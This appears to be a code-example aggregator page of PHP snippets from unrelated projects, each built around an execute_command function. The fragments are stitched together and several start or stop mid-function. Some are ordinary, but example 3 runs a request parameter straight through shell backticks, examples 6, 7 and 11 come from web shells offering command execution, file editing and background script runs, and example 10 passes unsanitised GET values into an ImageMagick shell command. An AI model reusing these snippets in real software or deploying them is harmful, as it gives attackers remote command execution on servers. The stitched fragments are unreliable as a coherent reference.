Exemplo n.º 1
0
function get_program_path($program)
{
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        $which = 'where';
    } else {
        $which = '/usr/bin/which';
    }
    $data = execute_command($which . ' ' . $program);
    if (!$data) {
        return false;
    }
    return !empty($data[0]) ? $data[0] : false;
}
Exemplo n.º 2
0
/**
 * Run an array of commands, substituting variables where appropriate.
 *
 * @param $commands
 *      Array of CLI commands to be executed which may contain variables to
 *      substitute.
 * @param $variables
 *      An key/value array of variables which may be substituted into commands
 *      before execution.
 */
function run_commands($commands, $variables)
{
    foreach ($commands as $command) {
        try {
            $command = parse_command($command, $variables);
            print '>> ' . $command . PHP_EOL;
            $output = execute_command($command);
            foreach ($output as $line) {
                print $line . PHP_EOL;
            }
        } catch (Exception $e) {
            print $e->getMessage() . PHP_EOL;
            exit(1);
        }
    }
}
Exemplo n.º 3
0
do_refresh_button();
?>

<?php 
function execute_command($command = "")
{
    if (isset($command) && !empty($command)) {
        $output = `{$command} 2>&1`;
        $output = htmlentities($output);
        print "<h2>{$command}</h2>";
        print "<p><pre>{$output}</pre></p>";
        print "<hr><p>Last update on ";
        print date(DATE_RFC822);
        print "</p>";
    }
}
?>

<?php 
$command = $_REQUEST['command'];
// grab user input
execute_command($command);
?>

<?php 
do_refresh_button();
?>

</body>
</html>
Exemplo n.º 4
0
        $code = '$__rs = ' . $code;
    }
    if ($last_char !== ';' && $last_char !== '}') {
        $code .= ';';
    }
    // var_dump($code);
    return array(null, $code);
}
function execute_command($cmd)
{
    if ($cmd === 'quit') {
        exit;
    }
}
while (true) {
    echo "phpsh > ";
    $str = fread(STDIN, 1000);
    if (empty($str)) {
        continue;
    }
    list($cmd, $code) = complete_expr($str);
    if ($cmd) {
        execute_command($cmd);
    } elseif ($code) {
        eval($code);
    }
    if (isset($__rs)) {
        var_dump($__rs);
        unset($__rs);
    }
}
Exemplo n.º 5
0
function tfu_preview($file)
{
    global $use_image_magic, $image_magic_path;
    $pdf_preview = false;
    if (file_exists(dirname(__FILE__) . '/thumbs') && is_writable(dirname(__FILE__) . '/thumbs')) {
        // is a caching dir available and writeable?
        $pdf_preview = true;
    }
    // we store the url of the last preview image in the session - use it if you need it ;).
    // we generate thumbs for jpge,png and gif!
    if (preg_match("/.*\\.(j|J)(p|P)(e|E){0,1}(g|G)\$/", $file) || preg_match("/.*\\.(p|P)(n|N)(g|G)\$/", $file) || preg_match("/.*\\.(g|G)(i|I)(f|F)\$/", $file)) {
        if (isset($_GET['big'])) {
            send_thumb($file, 90, 440, 280);
            // big preview 4x bigger!
        } else {
            send_thumb($file, 90, 80, 55);
            // small preview
        }
    } else {
        if (preg_match("/.*\\.(p|P)(d|D)(f|F)\$/", $file) && $use_image_magic && $pdf_preview) {
            $cachename = dirname(__FILE__) . '/thumbs/' . sha1($file) . '.jpg';
            if (!file_exists($cachename)) {
                $ima = realpath($file);
                $resize = '1000x1000';
                $command = $image_magic_path . ' "' . $ima . '[0]" -border 1x1 -quality 80 -thumbnail ' . $resize . ' "' . $cachename . '"';
                execute_command($command);
            }
            if (isset($_GET['big'])) {
                send_thumb($cachename, 90, 440, 280);
                // big preview 4x bigger!
            } else {
                send_thumb($cachename, 90, 80, 55);
                // small preview
            }
            // the cleanup is done in the thumbs folder which is cleaned up regularly
            // @unlink($cachename);
            return;
        } else {
            return;
            // we return nothing if no image.
        }
    }
}
Exemplo n.º 6
0
    $header .= ' [<a href="?p=' . $page . '&dir=' . realpath('.') . '">' . $page_name . '</a>] ';
}
$header .= '<br><hr>' . show_dirs('.') . '</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
//
//Page handling
//
if (isset($_REQUEST['p'])) {
    switch ($_REQUEST['p']) {
        case 'cmd':
            //Run command
            print "<form action=\"" . $me . "?p=cmd&dir=" . $_GET['dir'] . "\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
            if (isset($_REQUEST['command'])) {
                print "<pre>";
                execute_command(get_execution_method(), $_REQUEST['command']);
                //You want fries with that?
            }
            break;
        case 'edit':
            //Edit a fie
            if (isset($_POST['editform'])) {
                $f = $_GET['file'];
                $fh = fopen($f, 'w') or print "Error while opening file!";
                fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
                fclose($fh);
            }
            print "Editing file <b>" . $_GET['file'] . "</b> (" . perm($_GET['file']) . ")<br><br><form action=\"" . $me . "?p=edit&file=" . $_GET['file'] . "\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
            $rd = file($_GET['file']);
            foreach ($rd as $l) {
                print htmlspecialchars($l);
Exemplo n.º 7
0
function execute_script($code, $location, $extension, $output_needed = False)
{
    $filename = $_SESSION["daws_directory"] . "/" . time() . "." . $extension;
    write_to_file($filename, $code);
    $command = $location . " " . $filename;
    //run the script in background and redirect its output to null
    if ($output_needed == False) {
        //we have to make sure that the user doesn't care about the output since we're redirecting it to null
        if ($_SESSION["windows"] == True) {
            $command = "START /B {$command} > null";
        } else {
            if (execute_command("nohup", True)) {
                //use nohup if installed
                $command = "nohup {$command} > /dev/null 2>&1 &";
            }
        }
    }
    return execute_command($command);
}
 public function run($token, $environment, $command)
 {
     $result = $this->initialize($token, $environment);
     if ($result) {
         return $result;
     }
     $output = $command && !empty($command) ? execute_command($command) : '';
     //if(mb_detect_encoding($output) !== 'UTF-8') {
     $output = mb_convert_encoding($output, 'UTF-8');
     //}
     if ($output && substr($output, -1) == "\n") {
         $output = substr($output, 0, -1);
     }
     return array('output' => $output);
 }
Exemplo n.º 9
0
                            header("Content-Type: application/json", true);
                            echo '{"Message":"Error decoding JSON request"}';
                            exit;
                        }
                    } else {
                        log_message('warn', "Invalid Content-Type in request: " . $_SERVER['CONTENT_TYPE']);
                        header("Content-Type: application/json", true);
                        echo '{"Message":"Content-Type not set or invalid"}';
                        exit;
                    }
                }
                if (isset($request['RequestMethod'])) {
                    $command = trim($request['RequestMethod']);
                    $gMethodName = $command;
                    if ($gMethodName == 'GetGenerics') {
                        $gMethodName .= ' (' . $request['Type'] . ')';
                    }
                    execute_command($command, $capability, $db, $request);
                } else {
                    log_message('warn', "Request does not contain a RequestMethod: " . print_r($request, true));
                }
                exit;
            } else {
                log_message('warn', "Unhandled request method: " . $_SERVER['REQUEST_METHOD']);
                header("Content-Type: application/json", true);
                echo '{"Message":"Unhandled request method"}';
                exit;
            }
        }
    }
}
Exemplo n.º 10
0
function tfu_createThumb($file)
{
    global $compression, $use_image_magic, $image_magic_path, $pdf_thumb_format;
    if (!preg_match("/.*\\.(p|P)(d|D)(f|F)\$/", $file)) {
        $name = removeExtension($file) . "-" . $_GET['tfu_width'] . 'x' . $_GET['tfu_height'] . "." . getExtension($file);
        resize_file($file, $_GET['tfu_width'] . 'x' . $_GET['tfu_height'], $compression, basename($file), $name);
    } else {
        if ($use_image_magic) {
            $name = dirname(__FILE__) . '/' . removeExtension($file) . "-" . $_GET['tfu_width'] . '.' . $pdf_thumb_format;
            // create a pdf thumbnail
            $ima = realpath($file);
            if (!file_exists($name)) {
                $ima = realpath($file);
                $resize = $_GET['tfu_width'] . 'x' . $_GET['tfu_height'];
                $command = $image_magic_path . ' -colorspace rgb "' . $ima . '[0]" -border 1x1 -quality 80 -thumbnail ' . $resize . ' "' . $name . '"';
                execute_command($command);
            }
        }
    }
}
Exemplo n.º 11
0
function execute_script($code, $location, $extension, $output_needed = False)
{
    $filename = $_SESSION["daws_directory"] . "/" . rand(1, 1000) . "." . $extension;
    write_to_file($filename, $code);
    $command = $location . " " . $filename;
    //run the script in background and redirect its output to null
    if ($output_needed == False) {
        if ($_SESSION["windows"] == True) {
            $command = "START /B {$command} > null";
        } else {
            if (execute_command("nohup", True)) {
                $command = "nohup {$command} > /dev/null 2>&1 &";
            }
        }
    }
    return execute_command($command);
}
Exemplo n.º 12
0
 public function run($token, $environment, $command)
 {
     $result = $this->initialize($token, $environment);
     if ($result) {
         return $result;
     }
     $output = $command && !empty($command) ? execute_command($command) : '';
     if ($output && substr($output, -1) == "\n") {
         $output = substr($output, 0, -1);
     }
     return array('output' => $output);
 }
Exemplo n.º 13
0
                                echo '{"Message":"Error decoding JSON request"}';
                                exit;
                            }
                        } else {
                            log_message('warn', "Invalid Content-Type in request: " . $_SERVER['CONTENT_TYPE']);
                            header("Content-Type: application/json", true);
                            echo '{"Message":"Content-Type not set or invalid"}';
                            exit;
                        }
                    }
                    if (isset($request['RequestMethod'])) {
                        $command = trim($request['RequestMethod']);
                        $gMethodName = $command;
                        if ($gMethodName == 'GetGenerics') {
                            $gMethodName .= ' (' . $request['Type'] . ')';
                        }
                        execute_command($command, $db, $request);
                    } else {
                        log_message('warn', "Request does not contain a RequestMethod: " . print_r($request, true));
                    }
                    exit;
                } else {
                    log_message('warn', "Unhandled request method: " . $_SERVER['REQUEST_METHOD']);
                    header("Content-Type: application/json", true);
                    echo '{"Message":"Unhandled request method"}';
                    exit;
                }
            }
        }
    }
}